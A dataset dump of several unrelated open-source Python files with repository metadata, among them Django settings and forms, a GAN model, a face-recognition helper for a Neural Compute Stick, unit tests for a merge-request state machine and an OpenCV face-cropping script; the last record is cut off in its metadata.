Dataset schema (one row per source file; ⌀ marks nullable columns):

| column | dtype | range / values |
|---|---|---|
| blob_id | stringlengths | 40–40 |
| directory_id | stringlengths | 40–40 |
| path | stringlengths | 3–288 |
| content_id | stringlengths | 40–40 |
| detected_licenses | listlengths | 0–112 |
| license_type | stringclasses | 2 values |
| repo_name | stringlengths | 5–115 |
| snapshot_id | stringlengths | 40–40 |
| revision_id | stringlengths | 40–40 |
| branch_name | stringclasses | 684 values |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M (⌀) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | stringclasses | 22 values |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 (⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 (⌀) |
| gha_language | stringclasses | 147 values |
| src_encoding | stringclasses | 25 values |
| language | stringclasses | 1 value |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | stringclasses | 142 values |
| content | stringlengths | 128 – 8.19k |
| authors | listlengths | 1–1 |
| author_id | stringlengths | 1–132 |

The records below list each row's fields in the column order above, separated by `|`.
42ae99636bef2b466a152cd47dbb195677753fcc
|
4960e3e005ba04ec0a8b0defc6642dff5e71f5ae
|
/knowledge/cron/flow4/scan_domain2sentiment.py
|
82aed86bc47562f200906949fc65791e17a4ba4e
|
[] |
no_license
|
jianjian0dandan/knowledge_revised
|
aa7d772ba9efcaa579907b0418e145d6b440a9c9
|
ffc80dcca932c977755128c80c17dca603ee8a8b
|
refs/heads/master
| 2021-01-24T18:27:41.117166 | 2017-04-25T14:55:42 | 2017-04-25T14:55:42 | 84,448,466 | 1 | 0 | null | 2017-06-15T07:32:31 | 2017-03-09T14:02:46 |
HTML
|
UTF-8
|
Python
| false | false | 1,974 |
py
|
# -*- coding:utf-8 -*-
'''
Scan user domains into a Redis hash used for sentiment computation.
Update cadence: once a month.
'''
import sys
import time
from elasticsearch.helpers import scan
reload(sys)
sys.path.append('../../')
from global_utils import es_user_portrait, portrait_index_name, portrait_index_type
from global_utils import R_DOMAIN, r_domain_name
from parameter import domain_ch2en_dict
from time_utils import ts2datetime, datetime2ts
def del_domain_redis():
R_DOMAIN.delete(r_domain_name)
# Scan user domains into Redis, keyed by uid, storing the English domain name
def scan_domain2redis():
count = 0
s_re = scan(es_user_portrait, query={'query':{'match_all':{}}, 'size':1000}, index=portrait_index_name, doc_type=portrait_index_type)
start_ts = time.time()
hmset_dict = {}
while True:
try:
scan_re = s_re.next()['_source']
count += 1
uid = scan_re['uid']
domain_en = domain_ch2en_dict[scan_re['domain']]
hmset_dict[uid] = domain_en
if count % 1000 == 0 and count != 0:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
end_ts = time.time()
                print '%s sec count 1000' % (end_ts - start_ts)
start_ts = end_ts
hmset_dict = {}
except StopIteration:
if hmset_dict:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
hmset_dict = {}
break
        except Exception:
            # re-raise unexpected errors (the old unreachable `break` is dropped)
            raise
if hmset_dict:
R_DOMAIN.hmset(r_domain_name, hmset_dict)
print 'all count:', count
if __name__=='__main__':
log_time_ts = time.time()
log_time_date = ts2datetime(log_time_ts)
print 'cron/flow4/scan_domain2sentiment.py&start&' + log_time_date
del_domain_redis()
scan_domain2redis()
log_time_ts = time.time()
log_time_date = ts2datetime(log_time_ts)
    print 'cron/flow4/scan_domain2sentiment.py&end&' + log_time_date
|
[
"[email protected]"
] | |
1d2e2eb2c10108687a1dc49559484804e918c456
|
93d700b0275bca7bbe10da7b05afb63129180327
|
/cmsplugin_rst/forms.py
|
52c718fb178b45fdcd2bb193c48470d6edaec1f1
|
[
"BSD-3-Clause"
] |
permissive
|
nwojcik/cmsplugin-rst
|
d251a4bc029b4f804ee81b8cb5a4efbe719d3270
|
afc564dc32fff5fa5e0ad7a9449088cb49737db6
|
refs/heads/master
| 2021-01-16T20:26:48.392784 | 2011-10-09T13:29:06 | 2011-10-09T13:29:06 | 2,537,568 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
from cmsplugin_rst.models import RstPluginModel
from django import forms
help_text = '<a href="http://docutils.sourceforge.net/docs/ref/rst/restructuredtext.html">Reference</a>'
class RstPluginForm(forms.ModelForm):
body = forms.CharField(
widget=forms.Textarea(attrs={
'rows':30,
'cols':80,
'style':'font-family:monospace'
}),
help_text=help_text
)
    class Meta:
        model = RstPluginModel
        # required on Django >= 1.8; older Django implied "all fields" when omitted
        fields = '__all__'
|
[
"[email protected]"
] | |
45afd3a8a7c4e27c8a14cae91ba000ca278b0c88
|
e0f13152e4575f09f0b1e4b1811726bbe5066f90
|
/tests/spend.py
|
6f12c1c3b03880c9039e75a9eab6c88f5ec189dc
|
[] |
no_license
|
yagamidev/amoveo
|
88bc0dea994fab72c9f430f838ffc54418e30abf
|
4dfd6cc8a5cb740500a873c83ff979fa521ec4e7
|
refs/heads/master
| 2021-04-09T11:45:23.697801 | 2018-03-16T09:13:35 | 2018-03-16T09:13:35 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 728 |
py
|
from get_request import request
def spend_test():
print("spend test")
pub = "BGRv3asifl1g/nACvsJoJiB1UiKU7Ll8O1jN/VD2l/rV95aRPrMm1cfV1917dxXVERzaaBGYtsGB5ET+4aYz7ws="
priv = "nJgWyLTX1La8eCbPv85r3xs7DfmJ9AG4tLrJ5fiW6qY="
brainwallet = ''
request(2, "load_key", [pub, priv, brainwallet], 1)
request(1, "create_account", [pub, 1], 0.1)
request(1, "sync", [[127,0,0,1], 3020], 0.1)
request(1, "spend", [pub, 2])
request(1, "spend", [pub, 3])
request(1, "spend", [pub, 1])
request(1, "spend", [pub, 1])
request(1, "sync", [[127,0,0,1], 3020], 0.1)
request(1, "mine_block", [1,100000], 0.3)
request(1, "sync", [[127,0,0,1], 3020])
if __name__ == "__main__":
spend_test()
|
[
"[email protected]"
] | |
c5c02b528246d16171faa687ec9e7fb3d4df0a74
|
039ba9dba0f131496a959338c32e811904f00708
|
/mycrm/shopcrm/shopcrm/settings.py
|
bd18f1c8d64d8efad0647ac52c6bf4b7e4fd5f5d
|
[] |
no_license
|
mageshrocky/python_django_projects
|
49e12aff8fe08704c2d17b60d5373f0990120336
|
444c30780632ceea5c6b7377356ed2c3c5ce6253
|
refs/heads/master
| 2023-05-18T11:57:01.691868 | 2021-06-15T11:18:26 | 2021-06-15T11:18:26 | 377,125,078 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,265 |
py
|
"""
Django settings for shopcrm project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kqgrn!^+k=hkp)_mxpm+9_)0w=k)b@lsjyibe$qsog*$^3%hs7'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myapp.apps.MyappConfig',
'django_filters',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'shopcrm.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'shopcrm.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/images/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
MEDIA_ROOT = os.path.join(BASE_DIR, 'static/images')
|
[
"[email protected]"
] | |
93fb80555ba83304ee0774e8a8d306de3231038c
|
d8edd97f8f8dea3f9f02da6c40d331682bb43113
|
/networks439.py
|
52a3ed76800ad9bf46c5c6733e530a3fa5cc21d3
|
[] |
no_license
|
mdubouch/noise-gan
|
bdd5b2fff3aff70d5f464150443d51c2192eeafd
|
639859ec4a2aa809d17eb6998a5a7d217559888a
|
refs/heads/master
| 2023-07-15T09:37:57.631656 | 2021-08-27T11:02:45 | 2021-08-27T11:02:45 | 284,072,311 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,889 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
super().__init__()
self.ngf = ngf
self.seq_len = seq_len
self.version = __version__
# Input: (B, latent_dims, 1)
self.act = nn.ReLU()
self.lin0 = nn.Linear(latent_dims, seq_len//64*8192, bias=True)
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
self.bnu = nn.BatchNorm1d(out_channels)
self.bn1 = nn.BatchNorm1d(out_channels)
self.act = nn.ReLU()
def forward(self, x):
y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
y = self.act(self.bnu(self.convu(x)))
y = self.act(y0 + self.bn1(self.conv1(y)))
return y
self.conv1 = nn.ConvTranspose1d(8192, 6144, 4, 4, 0)
self.conv2 = nn.ConvTranspose1d(6144, 4096, 4, 4, 0)
self.conv3 = nn.ConvTranspose1d(4096, n_wires, 4, 4, 0)
self.bn1 = nn.BatchNorm1d(6144)
self.bn2 = nn.BatchNorm1d(4096)
self.bn3 = nn.InstanceNorm1d(n_wires)
self.convw1 = nn.ConvTranspose1d(n_wires, n_wires, 1, 1, 0)
#self.bnp0 = nn.BatchNorm1d(n_wires)
self.convxp = nn.ConvTranspose1d(n_wires, 256, 1, 1, 0)
self.bnp1 = nn.InstanceNorm1d(256)
self.convp2 = nn.ConvTranspose1d(256, 64, 1, 1, 0)
self.bnp2 = nn.InstanceNorm1d(64)
self.convp3 = nn.ConvTranspose1d(64, n_features, 1, 1, 0)
self.out = nn.Tanh()
def forward(self, z, wire_to_xy):
# z: random point in latent space
x = self.act(self.lin0(z).view(-1, 8192, self.seq_len // 64))
x = self.act(self.bn1(self.conv1(x)))
x = self.act(self.bn2(self.conv2(x)))
x = self.act(self.bn3(self.conv3(x)))
w = self.convw1(x)
wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)
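        # wg is a hard (one-hot) Gumbel-softmax selection over the n_wires axis;
        # contracting it with wire_to_xy (assumed shape (2, n_wires)) yields
        # (B, L, 2), permuted to (B, 2, L) so xy stacks with the feature channels.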
p = self.act(self.bnp1(self.convxp(x)))
p = self.act(self.bnp2(self.convp2(p)))
p = self.convp3(p)
return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
def __init__(self, ndf, seq_len, encoded_dim):
super().__init__()
self.version = __version__
# (B, n_features, 256)
self.act = nn.LeakyReLU(0.2)
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convd = nn.Conv1d(in_channels, out_channels, 3, 2, 1)
self.act = nn.LeakyReLU(0.2)
def forward(self, x):
y = self.act(self.convd(x))
return y
self.convpxy = nn.Conv1d(n_features+2, 64, 1, 1, 0)
self.db1 = DBlock(64, 128)
self.db2 = DBlock(128, 256)
#self.conv2 = nn.Conv1d(256, 512, 3, 2, 1)
#self.conv3 = nn.Conv1d(512, 1024, 3, 2, 1)
#self.conv4 = nn.Conv1d(1024, 2048, 3, 2, 1)
#self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
self.lin0 = nn.Linear(seq_len//4*256, 1)
self.out = nn.Identity()
def forward(self, x_):
# x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
# p_ shape is (batch, features, seq_len),
# w_ is AE-encoded wire (batch, encoded_dim, seq_len)
seq_len = x_.shape[2]
x = x_
#dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)
p = x[:,:n_features]
w = x[:,n_features:n_features+2]
wg = x[:,n_features+2:]
pxy = x[:,:n_features+2]
#x = torch.cat([p, w], dim=1)
#x = self.act(self.conv0(pxy))
p = self.convpxy(x[:,:n_features+2])
#x = torch.cat([xy, xwg], dim=1)
x = p
x = self.db1(x)
x = self.db2(x)
x = self.lin0(x.flatten(1,2))
return self.out(x)#.squeeze(1)
class VAE(nn.Module):
def __init__(self, encoded_dim):
super().__init__()
class Enc(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.LeakyReLU(0.2)
self.lin1 = nn.Linear(n_wires, hidden_size)
self.lin2 = nn.Linear(hidden_size, encoded_dim)
self.out = nn.Tanh()
def forward(self, x):
x = self.act(self.lin1(x))
return self.out(self.lin2(x))
class Dec(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.ReLU()
self.lin1 = nn.Linear(encoded_dim, hidden_size)
self.lin2 = nn.Linear(hidden_size, n_wires)
def forward(self, x):
x = self.act(self.lin1(x))
return self.lin2(x)
self.enc_net = Enc(512)
self.dec_net = Dec(512)
def enc(self, x):
return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)
def dec(self, x):
return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)
def forward(self, x):
y = self.dec_net(self.enc_net(x))
return y
def get_n_params(model):
return sum(p.reshape(-1).shape[0] for p in model.parameters())
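# Equivalent, more direct parameter count using torch's built-in:
#   sum(p.numel() for p in model.parameters())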
|
[
"[email protected]"
] | |
0fbcb4dace7a1a4154e9787babcc6e51e2fb5d94
|
46769b03aa33875bf4c7b1d4a2c51635a397cdfc
|
/new_test_22_dev_10089/wsgi.py
|
71a95a093114e20c8b2cd6e41198ec4cfed9c106
|
[] |
no_license
|
crowdbotics-apps/new-test-22-dev-10089
|
89b7e69c0dc0144f507ad6a0b84f06386d9a4e1c
|
ff18ba29e44581c139829607c663d731730b7bd9
|
refs/heads/master
| 2022-12-14T20:30:56.738780 | 2020-09-07T13:15:20 | 2020-09-07T13:15:20 | 293,532,502 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 419 |
py
|
"""
WSGI config for new_test_22_dev_10089 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'new_test_22_dev_10089.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
1cd44967f3be59b5da4887abb18f70c55b13da1d
|
79c1f1e1f9a123a146a314b9e4cd7f57c2301ed3
|
/visualize/CSVVsersion/SceneCSV.py
|
1fa2468f95df5ef35c99938e975a8dbef066891a
|
[
"MIT"
] |
permissive
|
ys1998/motion-forecast
|
41a1ebc553edddcf8c463d67237f53c23aa53729
|
ef8fa9d597906a756f28952a731f6bc8d178f2bf
|
refs/heads/master
| 2020-04-17T16:41:20.276427 | 2019-07-07T06:19:30 | 2019-07-07T06:19:30 | 166,751,355 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 874 |
py
|
import vtk
class SceneCSV(object):
def __init__(self):
self.sceneSources = list()
self.sceneMappers = list()
self.sceneActors = list()
self.sceneLights = list()
self.addLight(1.0, 1.0, 1.0, 1000, 1000, -1000, 0.75, 180, 0.75)
self.addLight(1.0, 1.0, 1.0, -1000, 500, 1000, 0.5, 180, 0.0)
        self.addLight(1.0, 1.0, 1.0, -1000, 500, -1000, 0.5, 180, 0.0)
def addLight(self, cR, cG, cB, pX, pY, pZ, Intensity, ConeAngle, Attenuation):
self.sceneLights.append(vtk.vtkLight())
self.sceneLights[-1].SetColor(cR, cG, cB)
self.sceneLights[-1].SetPosition(pX, pY, pZ)
self.sceneLights[-1].SetIntensity(Intensity)
self.sceneLights[-1].SetConeAngle(ConeAngle)
self.sceneLights[-1].SetShadowAttenuation(Attenuation)
self.sceneLights[-1].SetLightTypeToSceneLight()
|
[
"[email protected]"
] | |
be9f7d8b3ac111643c48d86d2142203de3228393
|
7b383cab8f9708dd9bc00c939cbab9600c0ca894
|
/UP2/NCS1/USBCam/Classes/NCS1.py
|
87c91137d99cfd455a3f827b54d10b7e35d6f62c
|
[
"MIT"
] |
permissive
|
amirunpri2018/TassAI
|
3f05b1b848d6d93fe491761589352bc0521496c3
|
3451f34d8973b67a823784e7db8fde03b274a60d
|
refs/heads/master
| 2022-12-22T06:48:46.024068 | 2020-10-01T15:43:25 | 2020-10-01T15:43:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,806 |
py
|
######################################################################################################
#
# Organization: Asociacion De Investigacion En Inteligencia Artificial Para La Leucemia Peter Moss
# Project: UP2 NCS1 Facial Recognition USB Security System
#
# Author: Adam Milton-Barker (AdamMiltonBarker.com)
#
# Title: NCS1 Class
# Description: NCS1 helper functions.
# License: MIT License
# Last Modified: 2020-09-28
#
######################################################################################################
import os, json, cv2, dlib, imutils
import numpy as np
from datetime import datetime
from imutils import face_utils
from mvnc import mvncapi as mvnc
from Classes.Helpers import Helpers
class NCS1():
""" NCS1 Class
NCS1 helper functions.
"""
def __init__(self):
""" Initializes the class. """
self.Known = []
self.Helpers = Helpers("NCS1")
self.Detector = dlib.get_frontal_face_detector()
self.Predictor = dlib.shape_predictor(
self.Helpers.confs["Classifier"]["Dlib"])
self.check()
self.load()
self.preprocess()
self.Helpers.logger.info("NCS1 class initialized.")
def check(self):
""" Checks for NCS1 device. """
#mvnc.SetGlobalOption(mvnc.GlobalOption.LOGLEVEL, 2)
devices = mvnc.EnumerateDevices()
if len(devices) == 0:
self.Helpers.logger.info(
"No Neural Compute Stick 1 devices, exiting")
quit()
self.ncs1 = mvnc.Device(devices[0])
self.ncs1.OpenDevice()
self.Helpers.logger.info("Connected to Neural Compute Stick 1")
def load(self):
""" Loads NCS1 graph. """
with open(self.Helpers.confs["Classifier"]["Graph"], mode='rb') as f:
graphFile = f.read()
self.Helpers.logger.info("Loaded NCS1 graph")
self.graph = self.ncs1.AllocateGraph(graphFile)
def preprocess(self):
""" Encodes the known users images. """
self.encoded = []
# Loops through all images in the security folder
for filename in os.listdir(self.Helpers.confs["Classifier"]["Known"]):
# Checks file type
if filename.lower().endswith(tuple(self.Helpers.confs["Classifier"]["Allowed"])):
fpath = os.path.join(
self.Helpers.confs["Classifier"]["Known"], filename)
# Gets user id from filename
user = os.path.splitext(filename)[0]
# Reads the image
raw, frame = self.prepareImg(cv2.imread(fpath))
# Saves the user id and encoded image to a list
self.encoded.append((user, self.infer(frame)))
self.Helpers.logger.info("Known data preprocessed!")
def faces(self, image):
""" Finds faces and their coordinates in an image. """
# Find faces
faces = self.Detector(image, 0)
# Gets coordinates for faces
coords = [self.Predictor(image, face) for face in faces]
return faces, coords
def prepareImg(self, frame):
""" Reads & processes frame from the local TassAI. """
# Resizes the frame
frame = cv2.resize(frame, (640, 480))
# Makes a copy of the frame
raw = frame.copy()
return raw, frame
def processImg(self, img):
""" Preprocesses an image for inference. """
dims = 160
resized = cv2.resize(img, (dims, dims))
processed = self.whiten(resized)
return processed
def whiten(self, grayscaled):
""" Creates a whitened image. """
mean = np.mean(grayscaled)
std_dev = np.std(grayscaled)
std_adjusted = np.maximum(std_dev, 1.0 / np.sqrt(grayscaled.size))
whitened_image = np.multiply(np.subtract(grayscaled, mean), 1 / std_adjusted)
return whitened_image
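    # Worked example of the clamp above (illustrative): a flat 160x160
    # single-channel crop has std_dev == 0, but 1.0/np.sqrt(25600) == 0.00625,
    # so std_adjusted never reaches zero and the division stays finite.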
def infer(self, img):
""" Runs the image through NCS1. """
self.graph.LoadTensor(self.processImg(img).astype(np.float16), None)
output, userobj = self.graph.GetResult()
return output
def match(self, frame, coords):
""" Checks faces for matches against known users. """
msg = ""
person = 0
confidence = 0
# Loops through known encodings
for enc in self.encoded:
# Encode current frame
encoded = self.infer(frame)
            # Check whether the squared embedding distance is within the match threshold
recognize = self.compare(enc[1], encoded)
# If known
if recognize[0] == True:
person = int(enc[0])
confidence = recognize[1]
msg = "TassAI identified User #" + str(person)
break
if(person == 0):
msg = "TassAI identified an intruder"
self.Helpers.logger.info(msg)
return person, confidence
    def compare(self, face1, face2):
        """ Determines whether two face encodings are a match. """
        if (len(face1) != len(face2)):
            self.Helpers.logger.info("Distance Mismatch")
            # return a (matched, distance) tuple so callers can always unpack
            return False, 0
tdiff = 0
for index in range(0, len(face1)):
diff = np.square(face1[index] - face2[index])
tdiff += diff
if (tdiff < 1.3):
self.Helpers.logger.info("Calculated Match: " + str(tdiff))
return True, tdiff
else:
self.Helpers.logger.info("Calculated Mismatch: " + str(tdiff))
return False, tdiff
|
[
"[email protected]"
] | |
2de76a36c9302294182913712a4cbdbd7f90c964
|
9e1f60a867f66b1f4e4fc84fa4252c581e5e1a36
|
/Chapter09/test_state_1.py
|
e33eaec766eaab31fbfd5891365def90b52cc707
|
[
"MIT"
] |
permissive
|
PacktPublishing/Clean-Code-in-Python
|
c216e002485b8cd7736f97b59215a3930f35359a
|
7348d0f9f42871f499b352e0696e0cef51c4f8c6
|
refs/heads/master
| 2023-06-10T13:40:33.331115 | 2023-05-30T17:48:09 | 2023-05-30T17:48:09 | 145,072,942 | 523 | 181 |
MIT
| 2023-05-30T17:48:10 | 2018-08-17T04:48:38 |
Python
|
UTF-8
|
Python
| false | false | 1,489 |
py
|
"""Clean Code in Python - Chapter 9: Common Design Patterns
> Test State
"""
import unittest
from state_1 import Closed, InvalidTransitionError, Merged, MergeRequest, Open
class TestMergeRequestTransitions(unittest.TestCase):
def setUp(self):
self.mr = MergeRequest("develop", "master")
def test_reopen(self):
self.mr.approvals = 3
self.mr.open()
self.assertEqual(self.mr.approvals, 0)
def test_open_to_closed(self):
self.mr.approvals = 2
self.assertIsInstance(self.mr.state, Open)
self.mr.close()
self.assertEqual(self.mr.approvals, 0)
self.assertIsInstance(self.mr.state, Closed)
def test_closed_to_open(self):
self.mr.close()
self.assertIsInstance(self.mr.state, Closed)
self.mr.open()
self.assertIsInstance(self.mr.state, Open)
def test_double_close(self):
self.mr.close()
self.mr.close()
def test_open_to_merge(self):
self.mr.merge()
self.assertIsInstance(self.mr.state, Merged)
def test_merge_is_final(self):
self.mr.merge()
regex = "already merged request"
self.assertRaisesRegex(InvalidTransitionError, regex, self.mr.open)
self.assertRaisesRegex(InvalidTransitionError, regex, self.mr.close)
def test_cannot_merge_closed(self):
self.mr.close()
self.assertRaises(InvalidTransitionError, self.mr.merge)
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
2145526225efcedfd80d26083e233b193732814f
|
8ff6c3e513e17be6c51b484bed81d03150bdd175
|
/2013-01-facegif/cutface.py
|
afb58002b5ace80bf5625eccd582ac4bee62a9f2
|
[] |
no_license
|
ricbit/Oldies
|
f1a2ac520b64e43d11c250cc372d526e9febeedd
|
2d884c61ac777605f7260cd4d36a13ed5a2c6a58
|
refs/heads/master
| 2023-04-27T20:35:19.485763 | 2023-04-26T04:45:44 | 2023-04-26T04:45:44 | 2,050,140 | 40 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,089 |
py
|
import cv
import os
import sys
def DetectFaces(image):
cascade = cv.Load('haarcascade_frontalface_alt.xml')
storage = cv.CreateMemStorage(0)
return cv.HaarDetectObjects(
image, cascade, storage, 1.2, 2, cv.CV_HAAR_DO_CANNY_PRUNING)
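# Note: the old cv API's HaarDetectObjects returns (rect, neighbours) pairs,
# which is why cut_image below unpacks each detection as face[0].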
def cut_image(image):
grayscale = cv.CreateImage(cv.GetSize(image), 8, 1)
cv.CvtColor(image, grayscale, cv.CV_BGR2GRAY)
#cv.EqualizeHist(grayscale, grayscale)
faces = DetectFaces(grayscale)
ans = []
for face in faces:
x, y, dx, dy = face[0]
cropped = cv.CreateMat(dx, dy, cv.CV_8UC1)
cv.GetRectSubPix(grayscale, cropped, (x + dx / 2, y + dy / 2))
resized = cv.CreateImage((92, 112), 8, 1)
cv.Resize(cropped, resized)
ans.append(resized)
return ans
def main():
path = sys.argv[1]
i = 0
for filename in os.listdir(path):
fullpath = os.path.join(path, filename)
print fullpath
image = cv.LoadImage(fullpath)
for cut in cut_image(image):
output = os.path.join(sys.argv[2], '%d.jpg' % i)
cv.SaveImage(output, cut)
i += 1
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
4e6ebbffaa7463d3cfd44e97df532f2dee48d07a
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2788/60595/251681.py
|
ce493d0bf81d1f4beb8b4ad066205aea69c75fcb
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 794 |
py
|
def Test():
n=int(input())
boys=eval("["+input().strip().replace(" ",",")+"]")
m=int(input())
girls=eval("["+input().strip().replace(" ",",")+"]")
z=min(m,n)
parts=[]
j=0
    if(z==n):
        # also stop once boys is empty: each match pops boys[0], which would
        # otherwise raise IndexError while unmatched girls remain
        while(j<len(girls) and boys):
            if(check(boys[0],girls[j])):
                parts.append([boys[0],girls[j]])
                boys.remove(boys[0])
                girls.remove(girls[j])
            else:
                j=j+1
    else:
        while(j<len(boys) and girls):
            if (check(girls[0], boys[j])):
                parts.append([boys[j], girls[0]])
                boys.remove(boys[j])
                girls.remove(girls[0])
            else:
                j=j+1
print(len(parts))
def check(a,b):
return abs(a-b)<=1
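# e.g. check(3, 4) -> True and check(3, 5) -> False: partners may differ
# in value by at most 1.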
if __name__ == "__main__":
Test()
|
[
"[email protected]"
] | |
a4b1a60545658a8d8f78c60948c9a730f08c530f
|
2daa3894e6d6929fd04145100d8a3be5eedbe21c
|
/tests/artificial/transf_sqr/trend_constant/cycle_12/ar_/test_artificial_1024_sqr_constant_12__100.py
|
2239a2b9360d2647f6e4ca61b30fe39991f9a2e9
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Henri-Lo/pyaf
|
a1f73a0cc807873bd7b79648fe51de9cfd6c126a
|
08c968425d85dcace974d90db7f07c845a0fe914
|
refs/heads/master
| 2021-07-01T12:27:31.600232 | 2017-09-21T11:19:04 | 2017-09-21T11:19:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 310 |
py
|
import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art
dataset = tsds.generate_random_TS(N = 1024 , FREQ = 'D', seed = 0, trendtype = "constant", cycle_length = 12, transform = "sqr", sigma = 0.0, exog_count = 100, ar_order = 0);
art.process_dataset(dataset);
|
[
"[email protected]"
] | |
082a1d0a91074a3a3545799fa89ac845b5d5790b
|
bf448de248ec95325839b5e355af6982b4e5632d
|
/todo_project/testing_app/views/index.py
|
ac307f51c5dad4b28290138bc92c859ef3195724
|
[] |
no_license
|
rusalinastaneva/Python-Web-Basics
|
b459b8f47918b52654d304f3db3de54156299f66
|
ecdd72b44d4d0a1b107ef1f9fa10eb252bd4fd0e
|
refs/heads/master
| 2023-01-05T13:15:58.691511 | 2020-11-02T20:32:16 | 2020-11-02T20:32:16 | 309,486,341 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
